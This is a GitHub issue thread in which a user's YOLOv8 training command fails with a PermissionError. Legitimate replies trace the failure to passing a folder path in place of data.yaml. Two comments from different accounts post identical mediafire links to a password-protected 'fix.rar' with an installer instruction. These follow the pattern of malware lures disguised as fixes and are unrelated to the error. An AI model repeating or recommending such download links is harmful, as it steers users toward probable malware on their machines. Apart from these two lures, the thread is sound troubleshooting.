### ISSUE TITLE
Datatrain command gives error

### ISSUE THREAD

**Issue by delldelldelldell99** [ultralytics/ultralytics#15819]
### Search before asking

- [X] I have searched the Ultralytics YOLO [issues](https://github.com/ultralytics/ultralytics/issues) and [discussions](https://github.com/ultralytics/ultralytics/discussions) and found no similar questions.

### Question

Why does my yolov8 give me an error when I run this command: yolo task=detect mode=train model=yolov8s.pt data="C:\Users\kusha\Downloads\IdentifyPets" epochs=75 imgsz=640 plots=True

Downloading https://github.com/ultralytics/assets/releases/download/v0.0.0/yolov8s.pt to 'yolov8s.pt'...
100%|█████████████████████████████████████████████████████████████████████████████| 21.5M/21.5M [00:00<00:00, 80.6MB/s]
C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\nn\tasks.py:567: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.
  return torch.load(file, map_location='cpu'), file  # load
New https://pypi.org/project/ultralytics/8.2.82 available  Update with 'pip install -U ultralytics'
Ultralytics YOLOv8.0.196  Python-3.12.3 torch-2.4.0+cpu CPU (AMD Ryzen 5 7600X 6-Core Processor)
engine\trainer: task=detect, mode=train, model=yolov8s.pt, data=C:\Users\kusha\Downloads\IdentifyPets, epochs=75, patience=50, batch=16, imgsz=640, save=True, save_period=-1, cache=False, device=None, workers=8, project=None, name=None, exist_ok=False, pretrained=True, optimizer=auto, verbose=True, seed=0, deterministic=True, single_cls=False, rect=False, cos_lr=False, close_mosaic=10, resume=False, amp=True, fraction=1.0, profile=False, freeze=None, overlap_mask=True, mask_ratio=4, dropout=0.0, val=True, split=val, save_json=False, save_hybrid=False, conf=None, iou=0.7, max_det=300, half=False, dnn=False, plots=True, source=None, show=False, save_txt=False, save_conf=False, save_crop=False, show_labels=True, show_conf=True, vid_stride=1, stream_buffer=False, line_width=None, visualize=False, augment=False, agnostic_nms=False, classes=None, retina_masks=False, boxes=True, format=torchscript, keras=False, optimize=False, int8=False, dynamic=False, simplify=False, opset=None, workspace=4, nms=False, lr0=0.01, lrf=0.01, momentum=0.937, weight_decay=0.0005, warmup_epochs=3.0, warmup_momentum=0.8, warmup_bias_lr=0.1, box=7.5, cls=0.5, dfl=1.5, pose=12.0, kobj=1.0, label_smoothing=0.0, nbs=64, hsv_h=0.015, hsv_s=0.7, hsv_v=0.4, degrees=0.0, translate=0.1, scale=0.5, shear=0.0, perspective=0.0, flipud=0.0, fliplr=0.5, mosaic=1.0, mixup=0.0, copy_paste=0.0, cfg=None, tracker=botsort.yaml, save_dir=C:\Users\kusha\runs\detect\train5
Traceback (most recent call last):
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\engine\trainer.py", line 118, in __init__
    self.data = check_det_dataset(self.args.data)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\data\utils.py", line 245, in check_det_dataset
    if isinstance(data, (str, Path)) and (zipfile.is_zipfile(data) or is_tarfile(data)):
                                                                      ^^^^^^^^^^^^^^^^
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\tarfile.py", line 2795, in is_tarfile
    t = open(name)
        ^^^^^^^^^^
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\tarfile.py", line 1802, in open
    return func(name, "r", fileobj, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\tarfile.py", line 1870, in gzopen
    fileobj = GzipFile(name, mode + "b", compresslevel, fileobj)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\gzip.py", line 192, in __init__
    fileobj = self.myfileobj = builtins.open(filename, mode or 'rb')
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 13] Permission denied: 'C:\\Users\\kusha\\Downloads\\IdentifyPets'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Scripts\yolo.exe\__main__.py", line 7, in <module>
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\cfg\__init__.py", line 445, in entrypoint
    getattr(model, mode)(**overrides)  # default args from model
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\engine\model.py", line 336, in train
    self.trainer = (trainer or self._smart_load('trainer'))(overrides=args, _callbacks=self.callbacks)
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\kusha\AppData\Local\Programs\Python\Python312\Lib\site-packages\ultralytics\engine\trainer.py", line 122, in __init__
    raise RuntimeError(emojis(f"Dataset '{clean_url(self.args.data)}' error ❌ {e}")) from e
RuntimeError: Dataset 'C://Users/kusha/Downloads/IdentifyPets' error  [Errno 13] Permission denied: 'C:\\Users\\kusha\\Downloads\\IdentifyPets'

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Y-T-G** [comment]
Maybe your antivirus is blocking access to the folder.

**Comment by delldelldelldell99** [comment]
Nope, disabled antivirus and it still gave the same word for word error.

**Comment by glenn-jocher** [comment]
@delldelldelldell99 it seems like a permissions issue with accessing the dataset directory. Please ensure that the directory and its files have the appropriate read/write permissions and try running the command with administrative privileges.

**Comment by delldelldelldell99** [comment]
How do I make sure it has read / write permissions? Sorry if its a dumb question, im new to python.

**Comment by Y-T-G** [comment]
You're providing a folder path to `data#`. But you're supposed to provide the path to `data.yaml` for training.

https://docs.ultralytics.com/modes/train/

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
